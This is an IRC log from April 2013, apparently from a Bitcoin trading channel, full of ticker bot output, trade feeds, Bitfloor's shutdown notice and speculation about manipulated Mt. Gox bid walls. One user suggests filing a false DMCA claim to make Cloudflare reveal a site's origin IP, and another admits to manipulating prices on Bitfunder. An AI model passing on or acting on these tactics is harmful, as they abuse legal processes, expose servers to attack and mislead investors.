have such a headache Apr 17 01:10:01 Hmm, why? Apr 17 01:10:14 Usually, me it's because I spent too much time watching the market Apr 17 01:10:23 Instead of sleeping Apr 17 01:11:17 hungry and food is still cooking Apr 17 01:23:53 Is satoshidice.com down? Apr 17 01:24:35 ;;isitdown satoshidice.com Apr 17 01:24:40 satoshidice.com is down Apr 17 01:24:48 It loads here Apr 17 01:25:06 someone suggested DDoS a little bit ago - dunno tho Apr 17 01:25:25 deposits flushed. Apr 17 01:25:32 If it's DDoS, maybe intermittent Apr 17 01:26:08 from my office is not loading Apr 17 01:26:13 or not successful Apr 17 01:26:37 works for me Apr 17 01:26:58 [HAVELOCK] [VTX] 20 @ 0.48 = 9.6 BTC [-] Apr 17 01:30:33 got an email saying "your Bitcoin withdrawal address: 98f2bd4e-bfd4-3648-bec5..." Apr 17 01:30:34 it's interesting. from my office. satoshidice.com is not working but 94.142.154.208 loads perfectly Apr 17 01:36:31 I'd like to take this time and pause for a moment for the allmighty Apr 17 01:36:31 http://www.youtube.com/watch?v=Ll3uipTO-4A Apr 17 01:38:21 heh i see you know a thing or two about music Apr 17 01:39:53 from here sdice loads, but the tables not Apr 17 01:59:50 [MPEX] [S.MPOE] 12900 @ 0.00069444 = 8.9583 BTC [+] Apr 17 02:00:32 http://www.youtube.com/watch?v=QmADHKt3OEk Apr 17 02:01:10 this is moar romantic: http://www.youtube.com/watch?v=wtqflgdzNEM Apr 17 02:01:27 aka wild boar porn :P Apr 17 02:07:08 wow Apr 17 02:16:20 how romantic Apr 17 02:26:47 https://www.bitmit.net/en/item/12779-goat Apr 17 02:26:55 alone? feeling romantic? Apr 17 02:27:25 shy? Apr 17 02:27:30 wear this https://www.bitmit.net/en/item/24034-very-unique-goat-skull Apr 17 02:30:17 [BTCTC] [S.MPOE-PT] 1 @ 0.00069 BTC [-] Apr 17 02:30:43 [BTCTC] [ASICMINER-PT] 1 @ 0.922 BTC [+] Apr 17 02:31:06 funny how nobody talking, pasting links about what they gonna shop for next Apr 17 02:31:24 I see one enthusiastic fellow wants some livestock though. Apr 17 02:31:26 27 years old goat? not sure if serious... or it's our Chaang? Apr 17 02:33:32 [MPEX] [S.MPOE] 5888 @ 0.00070243 = 4.1359 BTC [+] Apr 17 02:36:38 better than a lawn mower Apr 17 02:38:25 i've yet to step in lawnmower shit. Apr 17 03:16:21 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Apr 17 03:40:25 [BTCTC] [BTC-BOND] 13 @ 0.01 = 0.13 BTC [+] Apr 17 03:55:14 [MPEX] [S.MPOE] 4300 @ 0.0007 = 3.01 BTC [-] Apr 17 04:01:38 ;;ticker Apr 17 04:01:39 BTCUSD ticker | Best bid: 63.50000, Best ask: 63.98999, Bid-ask spread: 0.48999, Last trade: 63.50000, 24 hour volume: 567285.81103329, 24 hour low: 50.01000, 24 hour high: 82.39000, 24 hour vwap: 64.95732 Apr 17 04:08:34 [BTCTC] [ASICMINER-PT] 5 @ 0.92 = 4.6 BTC [-] **** BEGIN LOGGING AT Thu Apr 18 12:12:35 2013 Apr 18 12:24:50 good morning everyone Apr 18 12:25:18 mornin Apr 18 12:30:12 heya Apr 18 12:36:16 hi Apr 18 12:36:49 btw seems dull lol Apr 18 12:36:59 btc world seems dull i mean Apr 18 12:40:33 ITS OVER MAN! Apr 18 12:46:02 the crazyness? Apr 18 12:46:17 im okay with that for a while Apr 18 12:57:16 whats over? Apr 18 12:57:48 you know... Apr 18 12:57:50 bitcoin Apr 18 12:58:09 lol Apr 18 12:58:30 crazy about bitfloor Apr 18 12:58:34 but bound to happen i guess Apr 18 13:00:12 MJR_ im resisting the urge to search through logs for me going "don't use bitfloor" at people. Apr 18 13:00:46 eh, it wasn't really a problem Apr 18 13:00:53 its the only exchange i've used Apr 18 13:00:59 everyone got their money out Apr 18 13:01:03 a, they paid out ? Apr 18 13:01:10 yes Apr 18 13:01:15 orderly unwinding Apr 18 13:01:27 i believe at the moment you can still withdraw using the site.. Apr 18 13:01:29 a that's nioce then Apr 18 13:01:31 though trading is done Apr 18 13:01:52 I am sorry to announce that due to circumstances outside of our control BitFloor must cease all trading operations indefinitely. Unfortunately, our US bank account is scheduled to be closed and we can no longer provide the same level of USD deposits and withdrawals as we have in the past. As such, I have made the decision to halt operations and return all funds. Apr 18 13:01:53 Over the next days we will be working with all clients to ensure that everyone receives their funds. Please be patient as we process your request. Apr 18 13:01:53 - Roman Apr 18 13:01:53 founder - bitfloor.com Apr 18 13:02:24 there was a different announcement... Apr 18 13:09:37 hm Apr 18 13:09:49 what of the people who were going to get repaid out of the exchange comissuion ? Apr 18 13:11:25 i was wondering about that too Apr 18 13:15:48 sorry took a nap. Apr 18 13:23:17 it's ok, your punishment is 10 whips Apr 18 13:23:49 ok, get in the asswhippin line Apr 18 13:27:05 yeah not sure about them... Apr 18 13:27:26 i am going to talk to roman soon, i was texting with him Apr 18 13:27:33 and want to see if we can help him move offshore Apr 18 13:28:36 you think its worth saving bitfloor after all that happend there MJR_ Apr 18 13:28:55 [MPEX] [S.MPOE] 2800 @ 0.00070303 = 1.9685 BTC [+] Apr 18 13:28:56 what does he have? Apr 18 13:29:04 a name? yeah we know he fucked up Apr 18 13:29:06 trust? no Apr 18 13:29:09 a bank account? no Apr 18 13:29:19 srsly? Apr 18 13:30:32 maybe you are better off supporting TH wackos Apr 18 13:30:38 lol good point Apr 18 13:30:42 not supporting Apr 18 13:31:58 well.. same happened to gox, multiple times... and we are so not supporting it :D Apr 18 13:32:40 jurov WE ARE NOT! Apr 18 13:33:05 jurov indeed we aren't. Apr 18 13:34:13 its just alternatives suck hard :\ Apr 18 13:37:15 yeah Apr 18 13:37:23 i never said support Apr 18 13:37:31 i just said help Apr 18 13:37:33 there was a different announcement... ... ... Apr 18 13:38:12 ok but how is help not support Apr 18 13:38:51 why do i keep ping timeout? Apr 18 13:39:15 if you help the nazis arent you supporting them? Apr 18 13:39:20 [MPEX] [S.MPOE] 11650 @ 0.00070303 = 8.1903 BTC [+] Apr 18 13:39:21 [MPEX] [S.MPOE] 7350 @ 0.00071248 = 5.2367 BTC [+] Apr 18 13:39:58 but im not saying you shouldnt support roman Apr 18 13:40:01 do what you feel :) Apr 18 13:40:11 lol, good point Apr 18 13:40:25 i meant not financially support, but offer some advice and maybe help set some things up Apr 18 13:40:34 so for me that is a big difference Apr 18 13:40:39 ok :) Apr 18 13:41:00 also, if you can get it back up again and retain customers, you could conceivably get a revenue share Apr 18 13:41:15 for whatever you did to get it back up again Apr 18 13:41:23 AHA! Apr 18 13:41:32 thats your evil plan then :D Apr 18 13:44:33 well, btc to usd exchanges can fail many times and there will still be interest Apr 18 13:44:57 ofc Apr 18 13:45:04 iirc preetymuch everyone was capped out Apr 18 13:45:07 in the last rally Apr 18 13:45:18 meaning theres room Apr 18 13:45:30 unlike my bitfunder endeavors... mpoe bonds scared everyone Apr 18 13:45:36 lol Apr 18 13:45:52 and difficulty futures proll exhausted pool of BFLievers Apr 18 13:45:58 loool Apr 18 13:46:18 ah bfl Apr 18 13:46:23 you should have some discount for them Apr 18 13:46:25 poor fellas Apr 18 13:48:14 hehehe Apr 18 13:48:21 a guy in my office just preordered now Apr 18 13:48:27 i'm like "what?!?!?" Apr 18 13:48:29 Mine should be here any day...... Apr 18 13:48:30 :o Apr 18 13:48:34 hehehe Apr 18 13:48:53 got 3 virtex 6's that i'm trying to get something going on...still Apr 18 13:48:58 its gonna be october for sure just not 2012 Apr 18 13:49:05 ;;goxlag Apr 18 13:49:11 BFL shocks the world by actually shipping something in 2020 Apr 18 13:49:23 Error: Problem retrieving gox lag. Try again later. Apr 18 13:49:30 MJR_ can you show them https://bitfunder.com/asset/CoinBr.iDiff-O ? Apr 18 13:49:33 after most people had already forgotten they were waiting Apr 18 13:49:45 just in case they want to hedge against difficulty skyrocketing ;) Apr 18 13:49:48 jurov: show who? Apr 18 13:49:49 MJR_ but he paid a lot more than preorders for half the spec? Apr 18 13:50:08 rofl Apr 18 13:50:10 don't know what he paid...but i think he just likes to get hardware Apr 18 13:50:15 13:49.33 ( MJR_ ) after most people had already forgotten they were waiting Apr 18 13:50:17 he got the raspberry pi before that Apr 18 13:50:20 like when you order stuff from DX Apr 18 13:50:23 and get it 2 months later Apr 18 13:50:34 "oohhh i forgot i ordered this what a nice suprise to self" Apr 18 13:50:40 jurov: ah ok, good idea Apr 18 13:50:49 aren't diffs too expensive? Apr 18 13:51:08 no, just lowered the offer from 0.19 to 0.16 Apr 18 13:51:12 ah ok Apr 18 13:51:13 cool Apr 18 13:51:16 it's a sale! Apr 18 13:51:30 i was going to say that i should map out the absolute upper bound of difficulty over the time period Apr 18 13:51:46 it can only go up by 4X Apr 18 13:51:51 every two weeks Apr 18 13:51:55 at most Apr 18 13:52:09 wait...take that back 4X every 2016 blocks Apr 18 13:52:25 nice, let me know... i'll write it into prospect Apr 18 13:52:42 oh eyah Apr 18 13:52:47 did you guys see on avalon? Apr 18 13:52:53 you can order 10k chips Apr 18 13:52:59 only like 781 btc Apr 18 13:56:40 282Mh/s per chip Apr 18 13:56:52 ;;calc 282 * 10000 Apr 18 13:56:52 2820000 Apr 18 13:57:00 2 million megahashes Apr 18 13:57:07 almost 3 Apr 18 13:59:18 ;;bids 0 Apr 18 13:59:19 There are currently 53900872 bitcoins demanded at or over 0.0 USD, worth 19947846.5096 USD in total. | Data vintage: 116.2202 seconds Apr 18 13:59:42 roughly 3 million more than yesterday? Apr 18 13:59:46 almost 20M, is that an ath ? Apr 18 14:00:05 in my experience it is.. Apr 18 14:00:38 ;;asks 260 Apr 18 14:00:38 There are currently 111956.4 bitcoins offered at or under 260.0 USD, worth 16801704.7573 USD in total. | Data vintage: 22.0432 seconds Apr 18 14:02:00 lol if you could get all those chips up and running....you would make back your bitcoins in a week Apr 18 14:02:18 very good deal for hardware people Apr 18 14:02:29 ;;eightball how long would it take to get all those chips up and running Apr 18 14:02:29 The answer is certainly yes. Apr 18 14:02:40 There you go.. Apr 18 14:09:18 bot down atm? Apr 18 14:11:52 ;;genrate 2820000 Apr 18 14:12:03 Error: Failed to retrieve current block bounty. Try again later. Apr 18 14:20:45 [BTCTC] [ASICMINER-PT] 1 @ 1.33 BTC [+] Apr 18 14:31:29 ;;ticker Apr 18 14:31:30 BTCUSD ticker | Best bid: 90.96450, Best ask: 90.99000, Bid-ask spread: 0.02550, Last trade: 90.99000, 24 hour volume: 269857.74349601, 24 hour low: 80.74999, 24 hour high: 98.77799, 24 hour vwap: 90.37506 Apr 18 14:36:17 [BTCTC] [ASICMINER-PT] 1 @ 1.333 BTC [+] Apr 18 14:42:55 [BTCTC] [ASICMINER-PT] 1 @ 1.35 BTC [+] Apr 18 14:43:44 thanks :) Apr 18 14:45:31 [MPEX] [S.DICE] 700 @ 0.00346247 = 2.4237 BTC [+] Apr 18 14:50:17 [MPEX] [S.MPOE] 20155 @ 0.00070162 = 14.1412 BTC [-] Apr 18 14:52:53 [MPEX] [S.MPOE] 19500 @ 0.00071041 = 13.853 BTC [+] Apr 18 15:04:10 hello Apr 18 15:04:14 [BTCTC] [COGNITIVE] 3 @ 0.17889 = 0.5367 BTC [-] Apr 18 15:05:08 hi Apr 18 15:05:54 rich in some ways, improving in others Apr 18 15:07:01 yeah cognitive! Apr 18 15:07:05 keep going up Apr 18 15:07:12 go AM! Apr 18 15:07:28 1.333 is nice to see Apr 18 15:08:22 things happen Apr 18 15:08:24 ;;bids 50 Apr 18 15:08:26 There are currently 189993.3 bitcoins demanded at or over 50.0 USD, worth 12716075.1439 USD in total. | Data vintage: 0.0064 seconds Apr 18 15:08:45 i think d3 is going to be wrong.. i think we will see 500 before 50 Apr 18 15:08:57 ;;asks 500 Apr 18 15:08:57 There are currently 131290.56 bitcoins offered at or under 500.0 USD, worth 23276051.5885 USD in total. | Data vintage: 30.6232 seconds Apr 18 15:09:52 only 2.2mil to go! :D Apr 18 15:10:51 you left out a 0 Apr 18 15:13:48 good morning Apr 18 15:14:25 hi Apr 18 15:14:41 if you were a market maker, why might you post huge big walls from 60-80, and also ask walls under 100? Apr 18 15:15:07 essentially holding price both higher and lower than it might go naturally? Apr 18 15:15:35 two market makers at odds? Apr 18 15:17:05 stabiliy is good Apr 18 15:17:19 we found fair market priuce maybe Apr 18 15:17:24 nah Apr 18 15:17:36 but with 20 million usd on the books i dont think so Apr 18 15:17:39 stability couldve happend at 70 Apr 18 15:17:42 people just hope to get cheap coins Apr 18 15:17:45 and they wont Apr 18 15:17:52 but enormous bid walls propped it up Apr 18 15:18:05 hell im happy if we stay here for a year Apr 18 15:18:08 93 is damn good for me Apr 18 15:18:25 i sodl enough at $200 plus (my ltc) to live for a few years:) Apr 18 15:18:39 yes, bids and asks in usd Apr 18 15:18:47 orderbook is shown in coinds Apr 18 15:18:49 there's no "wall" under 100, just a bunch of people trying to sell Apr 18 15:18:52 hell of a lot more bids than asks Apr 18 15:18:53 but bid walls are indeed dollars Apr 18 15:19:03 but chaang, Apr 18 15:19:14 so many of those dollars are articial floors Apr 18 15:19:21 someone is building something Apr 18 15:19:35 this isnt a natural price Apr 18 15:19:37 175,000 coins to $50 Apr 18 15:19:48 we will not see 50 for a while if ever Apr 18 15:20:06 double bottem was tested Apr 18 15:20:13 but why is that buyer propping price up, rather than buying? Apr 18 15:20:27 there are only two big bid orders, one at 80 and one at 70 Apr 18 15:20:27 i see buying beeing absorbed right now Apr 18 15:20:41 if those disappear for whatever reason 50 isn't out of reach Apr 18 15:20:47 you can also buy them with euros truffles Apr 18 15:20:54 it's just that the biggest market is in dollars Apr 18 15:20:55 sinbios, thats what i['m getting at Apr 18 15:21:02 the volume is mostly in usd, but the euro market and even yuan market will drag the dollar price around Apr 18 15:21:06 how much of this bidbook can disappear on a whim? Apr 18 15:21:10 and even most of europeans trade it in usd i think Apr 18 15:21:16 [MPEX] [S.DICE] 500 @ 0.00346246 = 1.7312 BTC [-] Apr 18 15:21:17 [MPEX] [S.DICE] 700 @ 0.00346247 = 2.4237 BTC [+] Apr 18 15:21:29 yes the bid walls can give up waiting and buy, but we were just at $50, why but now? Apr 18 15:21:40 we dont have panic buying right now, but we might again over $130 Apr 18 15:21:58 for 2 or 3 days, someone has been constructing this price, yet not letting it break the overall downward trend Apr 18 15:22:28 ? Apr 18 15:22:43 btc is one Apr 18 15:23:11 i think another big crash is coming Apr 18 15:23:26 once nations states are gone.... Apr 18 15:23:44 this manipulator WILL spend these dollars, and it WON'T be at these prices he constructed Apr 18 15:24:32 truffles: you'd be surprised at how fast things move nowadays Apr 18 15:24:33 truffles: i agree, we see the internal rot, but nationstates power will remain in our lifetimes. Apr 18 15:24:42 ehhh Apr 18 15:24:52 market has been kinda shaking, especially this week Apr 18 15:24:56 political centrifigalism Apr 18 15:25:03 what i think is that someone is manipulating, making up a large % of bid book, Apr 18 15:25:14 and i dont think fiat currencies can live forever when all central banks are printing money like crazy Apr 18 15:25:17 holding enough coins to be able remove all bids Apr 18 15:25:20 and crash it down Apr 18 15:25:23 you dont need bitcoin to kill fiat, fiat will kill itself the way it's going Apr 18 15:25:33 ^ Apr 18 15:25:36 yup Apr 18 15:27:04 [MPEX] [S.MPOE] 9389 @ 0.00071248 = 6.6895 BTC [+] Apr 18 15:27:06 [MPEX] [S.MPOE] 15218 @ 0.00072 = 10.957 BTC [+] Apr 18 15:27:11 the only reason to hold the price up, but under 100 Apr 18 15:27:23 i dont really like to think about that future where fiat breaks down, dont think it will be non violent Apr 18 15:27:23 is that he doesnt have enough coins to crash it at a higher price Apr 18 15:27:44 which means the crash could come sooner than later Apr 18 15:27:59 call me crazy Apr 18 15:28:04 to where tho? 70? 50? Apr 18 15:28:09 but i'm just trying to make sense of this manip Apr 18 15:28:25 yea obviously not Apr 18 15:28:26 thats not crash, it's a bitcoin sneeze Apr 18 15:28:34 no way to know Apr 18 15:28:45 none Apr 18 15:28:45 what if $10m of bids is on person? Apr 18 15:28:56 one* Apr 18 15:29:02 ;;bids 50 Apr 18 15:29:05 There are currently 189923.91 bitcoins demanded at or over 50.0 USD, worth 12726343.8662 USD in total. | Data vintage: 0.0065 seconds Apr 18 15:29:12 max keiser Apr 18 15:29:24 what if $15m is one person? Apr 18 15:29:29 would take a lot of balls to have 10million on gox Apr 18 15:29:37 what if it is gox Apr 18 15:30:09 gox has made more than that no? Apr 18 15:30:20 maybe they are using all the fees you pay them to control price Apr 18 15:30:23 ThickAsThieves: ...then what incentive does that person have to hold the price up instead of just letting it fall to $0.01 and buy it up then Apr 18 15:30:40 its a numbers Apr 18 15:30:41 game Apr 18 15:30:52 the more cash they get for the crash coins Apr 18 15:30:59 the more control they have at the bottom Apr 18 15:31:11 but if its gox Apr 18 15:31:15 it doesn even matter Apr 18 15:31:22 they could do anything they want Apr 18 15:31:23 how do you prove that an exchange is manipulating the price, provided that they are doing it right Apr 18 15:31:41 i don't understand what you're trying to say. what crash coins? Apr 18 15:31:42 you get everyone to cash out Apr 18 15:31:45 and see whats left Apr 18 15:31:46 hehe Apr 18 15:32:11 well assuming its not gox Apr 18 15:32:44 the manipulator would need to hold maybe 500k coins Apr 18 15:32:48 (guessing) Apr 18 15:32:56 and maybe $5,-$20m Apr 18 15:33:15 if they know they make up a certain % of bidbook Apr 18 15:33:25 they know exactly how many coins are needed to crash it to any price Apr 18 15:33:25 if it's gox they dont even need to hold anything Apr 18 15:33:28 right Apr 18 15:33:29 they can change a value in the database Apr 18 15:33:51 they can simply play with whatever the average balance is Apr 18 15:34:00 an no one could know Apr 18 15:34:19 only top management would know Apr 18 15:34:57 but cmon you guys have to see that this price is constructed Apr 18 15:35:05 i'm not crazy about that am i? Apr 18 15:36:02 there is no reason other than manip, to make bid walls that big Apr 18 15:36:35 so what Apr 18 15:36:45 the market is constantly manipulated Apr 18 15:36:54 so what so what Apr 18 15:37:02 Sinbios: there's a big difference Apr 18 15:37:06 this is new exaggerated behavior Apr 18 15:37:12 whale vs. the exchange themselves Apr 18 15:37:25 this is big Apr 18 15:37:29 who said it's the exchange? Apr 18 15:37:32 if the latter is true we're in deep shit Apr 18 15:37:36 [MPEX] [S.MPOE] 11600 @ 0.00072335 = 8.3909 BTC [+] Apr 18 15:37:37 we aren't Apr 18 15:37:38 [MPEX] [S.MPOE] 11000 @ 0.00072397 = 7.9637 BTC [+] Apr 18 15:37:43 this is a "what if" Apr 18 15:37:50 then why are you speculating? Apr 18 15:38:10 dont you remember how 2 days ago we were at about 70, then a 15k wall appeared? Apr 18 15:38:16 then it grew to 20k Apr 18 15:38:21 because it's not falsifiable either Apr 18 15:38:24 now last night one appears at 80 Apr 18 15:38:55 god's not falsifiable either, are you speculating it's god keeping the price up Apr 18 15:39:12 my point isnt to be high-minded Apr 18 15:39:19 the WHY doesnt matter Apr 18 15:39:24 is the whether and when Apr 18 15:39:26 I have a theory xenu might be buying btc, so yes Apr 18 15:39:35 ThickAsThieves: who cares? maybe it's some guy with deep pockets who thinks it's actually worth 70 and now 80 a coin Apr 18 15:39:45 i care Apr 18 15:39:50 just be prepared that it might disappear at any time and act accordingly Apr 18 15:40:03 so as i do what you just told me to do Apr 18 15:40:04 well you shouldn't Apr 18 15:40:08 you bitch about it/ Apr 18 15:40:26 because it's pointless speculating and you're just going to whip yourself into an anxious frenzy Apr 18 15:40:27 ;;ticker --last Apr 18 15:40:27 93.00000 Apr 18 15:40:30 be prepared, but stop caring Apr 18 15:40:35 ... Apr 18 15:40:51 i'm very calm actually Apr 18 15:40:53 i mean stop caring that it might be manipulation, because it is 100% manipulation Apr 18 15:40:57 i am calm Apr 18 15:41:05 i'm just excited to hash out my theory Apr 18 15:41:28 gox is offline Apr 18 15:41:30 disprove it or ignore it Apr 18 15:41:39 k Apr 18 15:42:07 i'm guessing most people are going with the latter, which might be why you don't get any replies when you ask if you're crazy Apr 18 15:42:09 ive been talking about this with others for a couple days now Apr 18 15:42:16 and its at the point where i want to share more Apr 18 15:42:28 share more thoughts or evidence ? Apr 18 15:42:32 i dont mind being wrong Apr 18 15:42:38 or crazy Apr 18 15:42:39 [BTCTC] [ASICMINER-PT] 1 @ 1.365 BTC [+] Apr 18 15:42:47 [BTCTC] [ASICMINER-PT] 2 @ 1.36 = 2.72 BTC [-] Apr 18 15:42:47 at least i'd have some new info Apr 18 15:42:48 :) Apr 18 15:42:55 [BTCTC] [ASICMINER-PT] 2 @ 1.35 = 2.7 BTC [-] Apr 18 15:43:33 ThickAsThieves I have a counter argument Apr 18 15:43:38 shoot Apr 18 15:44:00 that sort of manip would require someone working at gox who is competent Apr 18 15:44:01 lol Apr 18 15:44:07 haha Apr 18 15:44:11 two problems Apr 18 15:44:17 1. it doesnt HAVE to be gox Apr 18 15:44:29 2. it doesnt take THAT much skil Apr 18 15:44:35 skill* Apr 18 15:44:45 its just a matter of scale Apr 18 15:44:53 if you have that much resource Apr 18 15:45:02 playing this game is very easy Apr 18 15:45:10 im just trolling Apr 18 15:45:16 in fact im always trolling Apr 18 15:45:17 afk Apr 18 15:45:18 hehe Apr 18 15:46:27 right Apr 18 15:46:50 i have done this kind of thing with stocks on bitfunder Apr 18 15:46:59 constructed a price Apr 18 15:47:03 and tore it down Apr 18 15:47:36 no Apr 18 15:47:45 just money and smarts Apr 18 15:47:50 ;;ticker Apr 18 15:47:53 BTCUSD ticker | Best bid: 92.60000, Best ask: 92.60001, Bid-ask spread: 0.00001, Last trade: 92.60000, 24 hour volume: 258868.97500742, 24 hour low: 83.00000, 24 hour high: 98.77799, 24 hour vwap: 90.79159 Apr 18 15:47:59 $avg Apr 18 15:48:01 deadweasel: 90.42 Apr 18 15:48:27 lol Apr 18 15:48:47 yes, the person must be a functional member of the economy Apr 18 15:49:16 common sense isnt a big factor here Apr 18 15:51:24 also, someone noticing doesnt change anything Apr 18 15:51:33 yo'd have to convince most people Apr 18 15:51:45 and then have them be so convinced they actually react Apr 18 15:51:50 unlikely Apr 18 15:52:31 [BTCTC] [ASICMINER-PT] 4 @ 1.3998 = 5.5992 BTC [+] Apr 18 15:53:31 [BTCTC] [ASICMINER-PT] 1 @ 1.43 BTC [+] Apr 18 15:54:22 if it IS gox, i'm not sure i'd even want to know Apr 18 15:54:28 [BTCTC] [ASICMINER-PT] 1 @ 1.45 BTC [+] Apr 18 15:54:29 i have too much cash there Apr 18 15:54:38 will take me a long time to get it out Apr 18 15:54:54 http://i.imgur.com/QDKZohV.jpg Apr 18 15:54:55 lol Apr 18 15:55:06 i've got to find this Apr 18 15:55:44 [BTCTC] [ASICMINER-PT] 1 @ 1.4599 BTC [+] Apr 18 15:56:13 yeah, haha Apr 18 15:56:21 [BTCTC] [ASICMINER-PT] 10 @ 1.46 = 14.6 BTC [+] Apr 18 15:56:22 1.45 nice Apr 18 15:56:44 if i am right, i think the only possible outcome is a big crash when the manipulator gets to the point where he barely has enoush coins to control a crash Apr 18 15:58:04 occam told me no coincidence here Apr 18 15:58:11 [MPEX] [S.MPOE] 3199 @ 0.00072157 = 2.3083 BTC [-] Apr 18 15:58:30 how are 20k walls a coincidence? Apr 18 15:58:45 these arent walls that started at 1 and grew Apr 18 15:58:49 they just appeared Apr 18 15:59:34 like i said, it's 100% manipulation. it's the nature of this market, deal with it or go home Apr 18 16:00:00 like i said, it's theory, deal with it or go home Apr 18 16:00:14 good thing i don't have to deal with it Apr 18 16:00:27 yes please put me on ignore Apr 18 16:00:31 i'd appreciate it Apr 18 16:05:40 i guess some hard advice can be made from this theory, if you see those walls at 80 and 70 disappear, watch out Apr 18 16:06:06 but i dont think they are that dumb to be that obvious Apr 18 16:06:14 to blink them away as a hint Apr 18 16:06:20 [08:40:04] just be prepared that it might disappear at any time and act accordingly Apr 18 16:06:51 all hail sinbios Apr 18 16:07:04 people expecting a drop? Apr 18 16:07:19 just tinfoilhatting big time Apr 18 16:07:30 truffles: hold onto long positions hoping it'll keep going up? Apr 18 16:07:41 Cloudflare error messages from the MtGox API isn't a good sign. DDoS again? Prepare for impact? Apr 18 16:08:03 [BTCTC] [S.DICE-PT] 221 @ 0.00408 = 0.9017 BTC [+] Apr 18 16:08:13 [BTCTC] [S.DICE-PT] 122 @ 0.00409 = 0.499 BTC [+] Apr 18 16:08:16 blockchain.info was hit with ddos to their servers that are supposed to be hidden by cloudlfare Apr 18 16:08:33 so its possible cloudflare has been compromised ot something Apr 18 16:08:52 or* Apr 18 16:15:04 [BTCTC] [RSM] 34 @ 0.0028 = 0.0952 BTC [-] Apr 18 16:15:08 [BTCTC] [RSM] 49 @ 0.0029 = 0.1421 BTC [+] Apr 18 16:16:35 ThickAsThieves: it's not very hard to get cloudflare to reveal the site's IP address Apr 18 16:16:40 !ticker m ^oix Apr 18 16:16:41 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 24.03032819 / 24.03032819 / (5 shares, 5.40 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 18 16:16:42 all you need to do is file a false DMCA claim Apr 18 16:17:14 oix hahaha Apr 18 16:18:09 lol 5 btc Apr 18 16:18:21 mircea_popescu is a big meanie Apr 18 16:21:18 i'm with ThickAsThieves - manipulation is EASY with enough money and half a brain... Apr 18 16:23:51 when are credible news agencies gonna pick this http://www.dailypaul.com/282345/zimbabwe-makes-history-bitcoins-now-official-national-currency Apr 18 16:24:07 or discredit it... Apr 18 16:24:33 it sounds like a bullshit story Apr 18 16:24:39 no real source Apr 18 16:24:47 looks like a personal blog post or something Apr 18 16:25:10 some guys attempt to push up the price i guess, i dunno Apr 18 16:30:26 kids, don't bring -anal here =) Apr 18 16:30:39 lol Apr 18 16:31:59 ;;ticker Apr 18 16:31:59 BTCUSD ticker | Best bid: 92.22000, Best ask: 92.97000, Bid-ask spread: 0.75000, Last trade: 92.22000, 24 hour volume: 241621.59434693, 24 hour low: 83.00000, 24 hour high: 98.77799, 24 hour vwap: 90.96920 Apr 18 16:35:19 [MPEX] [S.MPOE] 1673 @ 0.00071041 = 1.1885 BTC [-] Apr 18 16:35:21 [MPEX] [S.MPOE] 10159 @ 0.00069581 = 7.0687 BTC [-] Apr 18 16:35:45 wow -slow day in bitcoin land Apr 18 16:43:51 [BTCTC] [ESECURITYSABTC] 4 @ 0.34 = 1.36 BTC [+] Apr 18 16:44:05 [BTCTC] [ESECURITYSABTC] 1 @ 0.29502 BTC [-] Apr 18 16:46:48 two more facets to add to my whale manip theory Apr 18 16:47:15 1. the manip and ddos would likely be the same source Apr 18 16:47:38 2. Only Gox would know how big of a bid wall is needed to force a floor Apr 18 16:47:52 not saying it would HAVE to be gox Apr 18 16:48:00 just that they would know easiest Apr 18 16:50:11 The wall at 80 has halved Apr 18 16:52:19 you don't think the wall has moved up? Apr 18 16:53:53 looks like it Apr 18 16:54:02 like it got spread out Apr 18 16:54:46 some kind of squeeze play Apr 18 16:54:48 can't tell Apr 18 16:54:58 [MPEX] [S.MPOE] 3900 @ 0.00069463 = 2.7091 BTC [-] Apr 18 16:57:19 squeeze the price here til the weekend Apr 18 16:57:50 then pop it and buy up for a couple days Apr 18 17:01:12 [BTCTC] [S.DICE-PT] 57 @ 0.00409 = 0.2331 BTC [+] Apr 18 17:01:20 [BTCTC] [S.DICE-PT] 33 @ 0.00382 = 0.1261 BTC [-] Apr 18 17:01:23 [BTCTC] [S.DICE-PT] 50 @ 0.00381 = 0.1905 BTC [-] Apr 18 17:01:26 [BTCTC] [S.DICE-PT] 100 @ 0.0038 = 0.38 BTC [-] Apr 18 17:01:29 [BTCTC] [S.DICE-PT] 94 @ 0.00373 = 0.3506 BTC [-] Apr 18 17:01:32 [BTCTC] [S.DICE-PT] 44 @ 0.003724 = 0.1639 BTC [-] Apr 18 17:02:30 [BTCTC] [GSDPT] 489 @ 0.003501 = 1.712 BTC [-] Apr 18 17:02:33 [BTCTC] [GSDPT] 6189 @ 0.0035 = 21.6615 BTC [-] Apr 18 17:02:52 [BTCTC] [CRYPTO-TRADE] 1 @ 0.18 BTC [-] Apr 18 17:03:15 [BTCTC] [GSDPT] 100 @ 0.0035 = 0.35 BTC [-] Apr 18 17:06:03 [HAVELOCK] [SDICE] 6 @ 0.3201 = 1.9206 BTC [-] Apr 18 17:17:01 [HAVELOCK] [SDICE] 1 @ 0.32000007 BTC [-] Apr 18 17:17:04 [MPEX] [S.DICE] 1000 @ 0.00310002 = 3.1 BTC [-] Apr 18 17:18:45 ;;later Apr 18 17:18:45 Error: "later" is not a valid command. Apr 18 17:18:57 whats the command to pm someone later? Apr 18 17:19:17 ;;pm later Apr 18 17:19:17 Error: "pm" is not a valid command. Apr 18 17:19:20 hehe Apr 18 17:19:23 !!later ? Apr 18 17:19:52 ;;next Apr 18 17:19:52 support: 91, 86 | targets: 100-102, 105, 110-113, 120, ..., 50% retracement at 160, new highs? | updated by OneFixt at Apr 18 2013, 08:08 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 6 hours, 11 minutes, and 50 seconds ago Apr 18 17:20:00 ;;ticker Apr 18 17:20:01 BTCUSD ticker | Best bid: 92.90002, Best ask: 92.97000, Bid-ask spread: 0.06998, Last trade: 92.97000, 24 hour volume: 213470.79482426, 24 hour low: 83.00000, 24 hour high: 96.40386, 24 hour vwap: 90.61458 Apr 18 17:24:51 http://www.youtube.com/watch?v=K2ku1A5Ox8U Apr 18 17:24:53 hahaha Apr 18 17:25:48 ;;bids 50 Apr 18 17:25:50 There are currently 191320.39 bitcoins demanded at or over 50.0 USD, worth 12858409.5504 USD in total. | Data vintage: 0.0071 seconds Apr 18 17:25:57 ;;bids 75 Apr 18 17:25:58 There are currently 59494.14 bitcoins demanded at or over 75.0 USD, worth 4890302.23197 USD in total. | Data vintage: 7.4589 seconds Apr 18 17:26:16 ;;bids 